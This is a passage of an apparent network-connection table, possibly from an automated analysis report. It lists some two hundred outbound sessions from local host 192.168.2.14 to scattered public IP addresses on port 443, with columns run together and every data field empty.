                                      15657192.168.2.143616252.37.107.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15658192.168.2.1456060113.27.13.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15659192.168.2.145377868.242.1.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15660192.168.2.1437416208.225.247.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15661192.168.2.1437470220.171.246.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15662192.168.2.144993637.104.236.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15663192.168.2.143520632.53.139.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15664192.168.2.1458500192.111.215.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15665192.168.2.1434692199.104.35.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15666192.168.2.1448256121.197.9.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15667192.168.2.1460734155.16.66.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15668192.168.2.144271427.204.170.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15669192.168.2.1435912221.24.219.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15670192.168.2.1444250114.89.224.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15671192.168.2.14541484.182.150.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15672192.168.2.1449888218.205.44.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15673192.168.2.1435746182.205.74.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15674192.168.2.1456594146.12.184.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15675192.168.2.1454986201.124.2.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15676192.168.2.1457370142.177.188.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15677192.168.2.144432037.92.253.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15678192.168.2.1457162132.32.114.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15679192.168.2.143355617.64.121.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15680192.168.2.1448618179.142.187.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15681192.168.2.1446964133.54.85.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15682192.168.2.1447112164.35.16.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15683192.168.2.1445796223.120.171.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15684192.168.2.1436610100.143.216.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15685192.168.2.1450002128.15.157.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15686192.168.2.1441226143.60.82.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15687192.168.2.1456906106.246.206.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15688192.168.2.1437176200.51.114.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15689192.168.2.1445700209.7.174.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15690192.168.2.1453106213.41.3.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15691192.168.2.1451476123.230.170.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15692192.168.2.145155677.39.102.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15693192.168.2.1440276105.72.47.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15694192.168.2.1448808103.121.189.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15695192.168.2.1434286193.137.64.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15696192.168.2.143336899.67.21.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15697192.168.2.143844814.223.129.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15698192.168.2.143726653.60.251.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15699192.168.2.1453892194.132.44.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15700192.168.2.1450694118.186.15.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15701192.168.2.144981653.162.93.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15702192.168.2.1441356166.98.0.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15703192.168.2.143396671.87.134.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15704192.168.2.1448468199.148.56.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15705192.168.2.1460846184.168.140.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15706192.168.2.145005664.66.140.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15707192.168.2.143721284.1.91.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15708192.168.2.1452556107.158.150.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15709192.168.2.1453224166.130.160.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15710192.168.2.1434432146.55.195.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15711192.168.2.1441798159.167.11.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15712192.168.2.1460102163.240.2.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15713192.168.2.1457900177.147.27.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15714192.168.2.1440446115.11.243.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15715192.168.2.144731457.97.174.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15716192.168.2.1436166179.11.144.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15717192.168.2.1433468175.48.114.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15718192.168.2.14411624.241.166.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15719192.168.2.144351897.229.14.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15720192.168.2.1456496212.216.15.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15721192.168.2.145770879.0.123.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15722192.168.2.1448110200.156.182.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15723192.168.2.143343890.130.53.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15724192.168.2.144639020.63.205.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15725192.168.2.1440920126.89.223.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15726192.168.2.1444820121.111.179.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15727192.168.2.1459150172.41.58.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15728192.168.2.1443238210.131.252.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15729192.168.2.145630848.48.92.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15730192.168.2.1441304111.95.35.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15731192.168.2.1437772130.113.10.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15732192.168.2.145639035.61.21.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15733192.168.2.1440238211.136.158.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15734192.168.2.1437478151.153.87.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15735192.168.2.143353861.215.129.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15736192.168.2.1460138208.119.93.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15737192.168.2.145820468.153.204.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15738192.168.2.1455732179.170.16.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15739192.168.2.144761235.45.209.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15740192.168.2.144787452.115.87.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15741192.168.2.1435672158.175.255.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15742192.168.2.1455662169.185.45.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15743192.168.2.1448082186.144.122.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15744192.168.2.1454734162.53.114.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15745192.168.2.1438978194.201.127.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15746192.168.2.144427689.1.189.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15747192.168.2.144440025.110.253.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15748192.168.2.144918870.179.37.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15749192.168.2.1434726216.117.188.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15750192.168.2.145450050.198.120.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15751192.168.2.1457560140.82.32.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15752192.168.2.1441464117.52.195.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15753192.168.2.144892671.235.228.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15754192.168.2.1459154118.151.182.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15755192.168.2.145867625.62.234.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15756192.168.2.145080043.160.191.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15757192.168.2.1449240186.126.5.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15758192.168.2.1453600111.101.88.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15759192.168.2.143740223.85.107.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15760192.168.2.145205819.199.234.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15761192.168.2.146059025.46.87.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15762192.168.2.1448876221.249.202.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15763192.168.2.145114854.200.163.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15764192.168.2.1457666216.55.117.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15765192.168.2.144404698.231.166.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15766192.168.2.144738462.246.106.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15767192.168.2.1444258199.56.18.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15768192.168.2.144679031.77.16.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15769192.168.2.1447522113.119.81.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15770192.168.2.1446144145.204.172.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15771192.168.2.143841842.75.242.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15772192.168.2.1448444177.247.90.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15773192.168.2.1450724187.161.134.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15774192.168.2.1438882118.48.242.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15775192.168.2.145762063.154.96.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15776192.168.2.145583468.179.58.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15777192.168.2.1446246148.65.237.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15778192.168.2.144873458.56.25.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15779192.168.2.1446386205.188.43.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15780192.168.2.1460204199.76.140.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15781192.168.2.1446152175.210.136.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15782192.168.2.1452144121.94.54.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15783192.168.2.1456840154.10.231.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15784192.168.2.1449244200.28.57.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15785192.168.2.143453671.172.12.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15786192.168.2.1434622198.129.224.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15787192.168.2.143421072.209.37.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15788192.168.2.1443616114.0.96.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15789192.168.2.1443574193.99.161.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15790192.168.2.1450768197.167.157.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15791192.168.2.145033631.9.73.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15792192.168.2.1455438129.62.206.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15793192.168.2.1450112112.85.216.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15794192.168.2.1445830208.177.97.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15795192.168.2.1446140167.86.167.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15796192.168.2.14543885.232.34.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15797192.168.2.1443930223.122.98.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15798192.168.2.144573020.133.45.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15799192.168.2.14390765.54.36.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15800192.168.2.1447566193.88.70.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15801192.168.2.143702254.31.170.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15802192.168.2.1448974167.81.193.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15803192.168.2.143817494.65.152.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15804192.168.2.143763890.192.160.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15805192.168.2.144663466.216.98.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15806192.168.2.1458686220.141.77.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15807192.168.2.1437110171.101.118.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15808192.168.2.144967489.151.147.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15809192.168.2.144010277.61.221.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15810192.168.2.1448368177.139.71.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15811192.168.2.1452628111.144.239.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15812192.168.2.146033269.171.238.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15813192.168.2.145359283.2.198.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15814192.168.2.143853891.195.187.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15815192.168.2.1435472195.194.96.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15816192.168.2.1438244218.198.135.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15817192.168.2.1455774188.99.33.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15818192.168.2.143697242.10.41.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15819192.168.2.1444948163.174.126.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15820192.168.2.145794239.242.12.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15821192.168.2.1460838177.55.255.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15822192.168.2.145280035.87.155.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15823192.168.2.143536290.177.0.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15824192.168.2.1458774167.33.202.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15825192.168.2.1437272213.104.148.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15826192.168.2.14346448.70.146.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15827192.168.2.1448266189.139.67.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15828192.168.2.1438628170.214.6.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15829192.168.2.1444026203.43.85.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15830192.168.2.1457942152.66.63.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15831192.168.2.143665037.121.70.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15832192.168.2.14585101.138.93.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15833192.168.2.145335634.252.247.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15834192.168.2.1460920152.95.0.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15835192.168.2.145880819.15.105.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15836192.168.2.1446294164.48.91.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15837192.168.2.1433684126.26.222.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15838192.168.2.1449910212.179.152.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15839192.168.2.1434822148.23.217.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15840192.168.2.1433486141.9.189.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15841192.168.2.144123212.204.42.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15842192.168.2.1455114194.63.21.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15843192.168.2.1459104210.121.17.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15844192.168.2.1439880109.208.5.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15845192.168.2.1454136174.92.219.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15846192.168.2.1452864205.188.139.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15847192.168.2.1434328183.123.177.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15848192.168.2.144901286.73.86.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15849192.168.2.143644499.221.85.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15850192.168.2.1451726178.247.66.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15851192.168.2.1444714221.108.250.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15852192.168.2.145545688.168.106.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15853192.168.2.145317288.67.125.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15854192.168.2.1457498104.204.15.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15855192.168.2.1437304140.86.107.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15856192.168.2.144256659.157.77.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15857192.168.2.144181074.100.90.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15858192.168.2.1452094112.74.179.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15859192.168.2.1445866170.202.10.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15860192.168.2.14403344.174.106.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15861192.168.2.143925653.20.110.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15862192.168.2.1457694205.178.190.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15863192.168.2.1435248179.22.90.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15864192.168.2.1453244182.148.148.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15865192.168.2.145655091.61.76.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15866192.168.2.144537698.171.95.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15867192.168.2.146037485.170.22.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15868192.168.2.1449202145.100.134.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15869192.168.2.14461988.10.40.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15870192.168.2.1438290118.173.189.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15871192.168.2.14518588.155.223.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15872192.168.2.1459794178.147.205.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15873192.168.2.144708678.179.224.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15874192.168.2.144156891.147.54.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15875192.168.2.143729079.132.6.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15876192.168.2.143450267.160.53.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15877192.168.2.1449416126.228.237.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15878192.168.2.1442868198.51.220.83443
                                      TimestampBytes transferredDirectionData


